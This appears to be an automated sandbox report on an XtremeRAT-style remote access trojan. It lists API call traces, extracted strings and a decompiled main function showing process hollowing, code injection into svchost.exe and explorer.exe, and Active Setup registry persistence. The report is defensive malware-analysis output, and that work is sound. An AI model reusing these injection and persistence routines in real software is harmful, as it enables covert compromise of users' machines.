Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(000000DC,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(000000DC,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(000000DC,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(01970000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(01970000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

DSma9HnKaPERSIST, xrefs: 00C8A16F
svchost.exe, xrefs: 00C8A196
DSma9HnKa, xrefs: 00C8A0C8
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C8A3A6
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
XTREME, xrefs: 00C8A42F
.xtr, xrefs: 00C8A3C2
svchost.exe, xrefs: 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
Mutex, xrefs: 00C8A489
InstalledServer, xrefs: 00C8A0D9
%DEFAULTBROWSER%, xrefs: 00C8A208
C:\Windows\InstallDir\, xrefs: 00C8A156
local, xrefs: 00C8A3EF
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
explorer.exe, xrefs: 00C8A383
SOFTWARE\, xrefs: 00C8A0CD
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
SOFTWARE\, xrefs: 00C8A472
Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8A0A2, Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 222
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00C8A0A2(void* __edx, void* __eflags) {
				short* _t14;
				short* _t16;
				short* _t19;
				short* _t25;
				short* _t35;
				intOrPtr _t51;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t63;
				void* _t65;
				void* _t67;
				long _t68;
				short* _t77;
				int* _t79;
				void* _t81;
				int* _t84;
				void* _t86;
				intOrPtr _t88;
				int* _t90;
				void* _t92;
				intOrPtr _t94;
				void* _t96;
				intOrPtr* _t103;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t139;
				void* _t140;
				void* _t141;
				intOrPtr _t143;
				intOrPtr _t146;
				intOrPtr _t150;
				intOrPtr _t161;
				void* _t167;
				signed int _t170;
				short* _t199;
				intOrPtr _t204;
				intOrPtr _t206;
				intOrPtr* _t210;
				intOrPtr _t214;
				intOrPtr* _t216;
				intOrPtr _t235;
				WCHAR* _t240;
				void* _t243;
				void* _t244;
				void* _t247;
				void* _t249;

				_t247 = __eflags;
				E00C814F0();
				_t14 =  *0xc8f898; // 0xc30000
				E00C83674(_t14);
				_t16 =  *0xc8f898; // 0xc30000
				E00C83674(E00C836D8(_t16, _t247));
				_t19 =  *0xc8f898; // 0xc30000
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t247), _t247, 2, _t19);
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t240 = 0xc8ec8a;
				_t25 =  *0xc8f898; // 0xc30000
				E00C82E48(_t25);
				_t199 =  *0xc8f898; // 0xc30000
				E00C82914(0xc914e8, _t199);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t247));
				E00C82914(0xc91b06, _t30);
				_t35 =  *0xc8f898; // 0xc30000
				_t170 = E00C836D8(_t35, _t247);
				E00C82E48(_t170);
				E00C82914(0xc916f2, _t170);
				if( *0xc8f38a == 1) {
					_t240 = E00C8263C(0, 0, "DSma9HnKaPERSIST");
					_t249 = GetLastError() - 0xb7;
					if(_t249 == 0) {
						CloseHandle(_t240);
					} else {
						CloseHandle(_t240);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t249);
						E00C8291C();
						_t161 =  *0xc8f89c; // 0x1970000
						E00C82E48(_t161);
						_t235 =  *0xc8f89c; // 0x1970000
						E00C82914(0xc8fac0, _t235);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
						_t167 =  *0xc8f8ac; // 0xdc
						E00C83CE4(_t167, 0xc8fccc,  &M00C88EF8);
					}
				}
				E00C81CD8(_t244 - 0x1838, 0x11, 0xc8f2b2);
				_t204 =  *0xc8b0dc; // 0x2ad9cc
				E00C81DBC( *((intOrPtr*)(_t244 - 0x1838)), _t204);
				if(_t249 != 0) {
					E00C81CD8(_t244 - 0x183c, 0x11, 0xc8f2b2);
					_t206 =  *0xc8b0d8; // 0x2a7934
					E00C81DBC( *((intOrPtr*)(_t244 - 0x183c)), _t206);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						_t51 =  *0xc8f89c; // 0x1970000
						 *0xc8f8ac = E00C83EA8(_t51, 0xc91f1c, _t244);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t139 =  *0xc8f89c; // 0x1970000
							_t140 = E00C83A54(_t139, 0xc8f8ac);
							__eflags = _t140;
							if(_t140 != 0) {
								_t141 =  *0xc8f8ac; // 0xdc
								 *0xc8f89c = E00C83B10(_t141);
							} else {
								 *0xc8f89c = E00C83094();
							}
							_t143 =  *0xc8f89c; // 0x1970000
							 *0xc8f8ac = E00C83EA8(_t143, 0xc91f1c, _t244);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								_t146 =  *0xc8f89c; // 0x1970000
								 *0xc8f8ac = E00C83EA8(_t146, 0xc91f1c, _t244);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						_t150 =  *0xc8f89c; // 0x1970000
						 *0xc8f8ac = E00C83EA8(_t150, 0xc91f1c, _t244);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t243 = 0;
				 *0xc8f8a8 = 0;
				_t250 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t170 =  *0xc8f898; // 0xc30000
					_t240 = E00C833A8(E00C83420(0, _t170, 0), 0xc8a704, _t250);
					if(E00C83960(_t170, E00C82E48(_t170), _t240) == 0) {
						SetFileAttributesW(_t240, 0x80);
						_t252 = E00C82E48(_t240) + _t132;
						E00C82914(0xc91d10, _t240);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t240) + _t132), 0xc91f1c, _t244), 0xc91d10, E00C897F4);
					}
				}
				_t56 = E00C833A8(E00C836D8(0xc918fc, _t252), 0xc90fdc, _t252);
				_t210 =  *0xc8b0f0; // 0xc8e01c
				 *_t210 = _t56;
				_t57 =  *0xc8b0f0; // 0xc8e01c
				_t59 = E00C833A8( *_t57, L".xtr", _t252);
				_t212 =  *0xc8b0f0; // 0xc8e01c
				 *_t212 = _t59;
				_t60 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t60) != 0 && E00C87B84(L"local", _t170, _t243) == 1) {
					_t255 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, "svchost.exe", 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
					}
					_t216 =  *0xc8b0e4; // 0xc8e024
					_t103 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t103, _t170, L"XTREME",  *_t216 - 0x1e, _t240, _t243, _t255);
					E00C82E14(_t244 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t244 - 0x1840,  *((intOrPtr*)(_t244 - 0x1844)), L"SOFTWARE\\", _t255);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t244 - 0x1840))), _t255, 2, "DSma9HnKa");
					_t115 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t115);
					_t117 =  *0xc8b0e8; // 0xc8e020
					_t212 = 0;
					E00C84600( *_t117, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t257 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					_t63 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t63);
					while(1) {
						_t213 = E00C88BC0;
						_t65 =  *0xc8f8ac; // 0xdc
						 *0xc8f8a8 = E00C83CE4(_t65, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4);
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t90 =  *0xc8b0e0; // 0xc8b000
							_t92 =  *0xc8f8ac; // 0xdc
							TerminateProcess(_t92,  *_t90);
							_t213 = 0xc91f1c;
							_t94 =  *0xc8f89c; // 0x1970000
							 *0xc8f8ac = E00C83EA8(_t94, 0xc91f1c, _t244);
						}
						_t243 = _t243 + 1;
						_t67 = E00C8263C(0, 0, "DSma9HnKa");
						_t241 = _t67;
						_t68 = GetLastError();
						__eflags = _t68 - 0xb7;
						_t170 = _t170 & 0xffffff00 | _t68 == 0x000000b7;
						CloseHandle(_t67);
						__eflags = _t170;
						if(_t170 == 0) {
							_t84 =  *0xc8b0e0; // 0xc8b000
							_t86 =  *0xc8f8ac; // 0xdc
							TerminateProcess(_t86,  *_t84);
							_t213 = 0xc91f1c;
							_t88 =  *0xc8f89c; // 0x1970000
							 *0xc8f8ac = E00C83EA8(_t88, 0xc91f1c, _t244);
						}
						__eflags = _t243 - 7;
						if(_t243 >= 7) {
							break;
						}
						__eflags = _t170 - 1;
						if(_t170 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t170, _t213, _t241, _t243);
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t79 =  *0xc8b0e0; // 0xc8b000
						_t81 =  *0xc8f8ac; // 0xdc
						TerminateProcess(_t81,  *_t79);
						E00C88BC0(_t170, _t241, _t243, __eflags, 0xc8fccc);
					}
					__eflags = _t243 - 7;
					if(_t243 >= 7) {
						__eflags = _t170;
						if(_t170 == 0) {
							_t77 =  *0xc8f898; // 0xc30000
							ShellExecuteW(0, L"open", _t77, 0, 0, 0);
						}
					}
					goto L38;
				} else {
					_t96 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t96);
					E00C840F8(0xc8e07c, _t170, _t212, _t240, _t243);
					E00C88BC0(_t170, _t240, _t243, _t257, 0xc8fccc);
					L38:
					_pop(_t214);
					 *[fs:eax] = _t214;
					_push(0xc8a632);
					E00C81B90(_t244 - 0x1844, 5);
					return E00C81B78(_t244 - 0x14);
				}
			}

0x00c8a0a2
0x00c8a0a2
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,000000DC), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,000000DC), ref: 00C83B4D
Part of subcall function 00C83B10: 775C13F0.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,000000DC), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(000000DC,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(000000DC,?,00000000,00000000,?,?,000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(000000DC,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(000000DC), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,01970000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

